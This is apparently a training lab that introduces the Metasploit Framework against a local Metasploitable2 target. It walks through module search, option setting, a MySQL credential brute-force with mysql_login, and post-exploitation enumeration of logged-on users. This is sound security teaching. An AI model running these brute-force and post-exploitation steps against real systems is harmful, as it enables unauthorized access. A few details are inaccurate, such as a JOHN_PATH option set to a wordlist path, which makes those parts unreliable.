Explore Metasploit Framework Basics

Introduction

In this lab, we will explore the fundamental concepts and usage of the Metasploit Framework, a powerful open-source penetration testing tool. Metasploit provides a comprehensive platform for identifying and exploiting vulnerabilities in various systems and applications. The goal of this lab is to familiarize you with the core components of Metasploit, its attack methodologies, and basic usage techniques.

Understanding the Metasploit Framework

In this step, we will introduce the Metasploit Framework, its architecture, and core concepts.

Metasploit is a powerful and widely-used penetration testing framework developed in Ruby. It consists of various components, including modules, interfaces, plugins, utilities, and libraries. The framework is designed to be modular, allowing for code reuse and extensibility.

The Metasploit Framework is organized into several key modules:

1. Exploits: These are code modules that leverage vulnerabilities in target systems to gain unauthorized access or execute arbitrary code.
2. Auxiliary: This module includes various support tools, such as scanners, fuzzers, and protocol manipulation utilities.
3. Encoders: These modules are used to obfuscate or encode payloads to bypass security mechanisms like antivirus software or firewalls.
4. Payloads: These modules contain the code that is executed on the target system after a successful exploitation.
5. Post-Exploitation: These modules provide functionality for maintaining access and conducting further actions on the compromised system.

Metasploit provides several interfaces for interacting with the framework, including a command-line interface (msfconsole), a web-based interface (Metasploit Web UI), and a command-line interface (Metasploit Command Line).

At first, let's start the lab environment. Start Metasploitable2 by double-clicking the xfce terminal on the desktop and entering the following command in the terminal:

sudo virsh start Metasploitable2

Wait for the target machine to start, it may take 1-3 minutes.

Ping the target machine to ensure it's running (press Ctrl-C to exit ping):

ping 192.168.122.102

Then, let's start the Kali container and enter the bash interface, execute the ping operation to verify network connectivity:

docker run -ti --network host b5b709a49cd5 bash

Now, we could execute the ping operation to verify network connectivity (press Ctrl-C to exit ping):

ping 192.168.122.102

Now, we could start the Metasploit console:

cd ~
msfconsole

In the following steps, we will explore the basic usage of the Metasploit console and perform various tasks.

Basic Navigation and Module Exploration

In this step, we will learn how to navigate the Metasploit console and explore the available modules.

The Metasploit console provides a command-line interface for interacting with the framework. Here are some basic commands:

• help: Display a list of available commands and their descriptions.
• search [keyword]: Search for modules based on the provided keyword.

Let's search for modules related to Linux in Metasploit console:

search linux

This command will list all modules related to Linux vulnerabilities and exploits.

To select a specific module, use the use command followed by the module path in Metasploit console:

use auxiliary/analyze/jtr_linux

Once a module is selected, you can view its options and required parameters using the show options command in Metasploit console:

show options

Here's an example of the output you might see:

Module options (auxiliary/analyze/jtr_linux):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   BLOWFISH              false            no        Include BLOWFISH hashes (Very Slow)
   BSDI                  true             no        Include BSDI hashes
   CONFIG                                 no        The path to a John config file to use instead of the default
   CRACKER_PATH                           no        The absolute path to the cracker executable
   CUSTOM_WORDLIST                        no        The path to an optional custom wordlist
   DES                   true             no        Indlude DES hashes
   FORK                  1                no        Forks for John the Ripper to use
   INCREMENTAL           true             no        Run in incremental mode
   ITERATION_TIMEOUT                      no        The max-run-time for each iteration of cracking
   KORELOGIC             false            no        Apply the KoreLogic rules to John the Ripper Wordlist Mode(slower)
   MD5                   true             no        Include MD5 hashes
   MUTATE                false            no        Apply common mutations to the Wordlist (SLOW)
   POT                                    no        The path to a John POT file to use instead of the default
   SHA256                false            no        Include SHA256 hashes (Very Slow)
   SHA512                false            no        Include SHA512 hashes (Very Slow)
   USE_CREDS             true             no        Use existing credential data saved in the database
   USE_DB_INFO           true             no        Use looted database schema info to seed the wordlist
   USE_DEFAULT_WORDLIST  true             no        Use the default metasploit wordlist
   USE_HOSTNAMES         true             no        Seed the wordlist with hostnames from the workspace
   USE_ROOT_WORDS        true             no        Use the Common Root Words Wordlist
   WORDLIST              true             no        Run in wordlist mode


Auxiliary action:

   Name  Description
   ----  -----------
   john  Use John the Ripper

Press Ctrl+D to quit the Metasploit console then start the inspection

Setting Module Options

In this step, we will learn how to set options for a selected module in Metasploit.

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

Select a module:

use auxiliary/analyze/jtr_linux

Many modules require specific options to be set before they can be executed. You can set an option using the set command followed by the option name and its value in Metasploit console like set OPTION_NAME value.

For example, let's set the JOHN_PATH option for the jtr_linux module in Metasploit console:

set JOHN_PATH /usr/share/metasploit-framework/data/wordlists/password.lst

You can also use the setg command to set a global option that will persist across module changes.

After setting the required options, you can execute the module using the run or exploit command in Metasploit console, depending on the module type.

run

or

exploit

To go back to the parent context or exit the current module, use the back command.

Press Ctrl+D to quit the Metasploit console then start the inspection

Exploiting a Vulnerability

In this step, we will simulate a real-world scenario and attempt to exploit a vulnerability on a target system.

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

Assume we have identified a vulnerable MySQL server on the target IP address 192.168.122.102. We can use the mysql_login module to attempt a brute-force attack on the MySQL credentials.

Select the mysql_login module in Metasploit console:

use auxiliary/scanner/mysql/mysql_login

Next, set the required options in Metasploit console:

set RHOSTS 192.168.122.102

set user_file /path/to/usernames.txt

set pass_file /path/to/passwords.txt

Finally, execute the module in Metasploit console:

exploit

Metasploit will attempt to log in to the MySQL server using the provided username and password combinations from the specified files, and the username and password we provided are just examples, the log in might be failed, you should replace them to the real username and password.

Press Ctrl+D to quit the Metasploit console then start the inspection

Post-Exploitation Tasks

In this step, we will explore the post-exploitation modules available in Metasploit, which can be used to maintain access and perform additional actions on a compromised system.

After successfully exploiting a vulnerability and gaining access to the target system, you can use post-exploitation modules to perform various tasks, such as:

• Gathering system information
• Escalating privileges
• Maintaining persistent access
• Pivoting to other systems

First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

To use a post-exploitation module, follow the same steps as with other module types in Metasploit console:

use post/windows/gather/enum_logged_on_users

show options

Here's an example of the output you might see:

Module options (post/windows/gather/enum_logged_on_users):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CURRENT  true             yes       Enumerate currently logged on users
   RECENT   true             yes       Enumerate recently logged on users
   SESSION                   yes       The session to run this module on

set SESSION 1

exploit

This example module enumerates the logged-on users on a Windows system, but Metasploit provides many other post-exploitation modules for various platforms and tasks.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, we explored the Metasploit Framework, a powerful tool for penetration testing and vulnerability assessment. We learned about the core components of Metasploit, such as exploits, payloads, and auxiliary modules. We also practiced navigating the Metasploit console, searching for modules, setting options, and executing modules to exploit vulnerabilities and perform post-exploitation tasks.

Metasploit provides a comprehensive and versatile platform for ethical hackers, security professionals, and researchers to identify and mitigate security vulnerabilities. By understanding and practicing with Metasploit, you can enhance your skills in penetration testing, vulnerability analysis, and overall security assessment.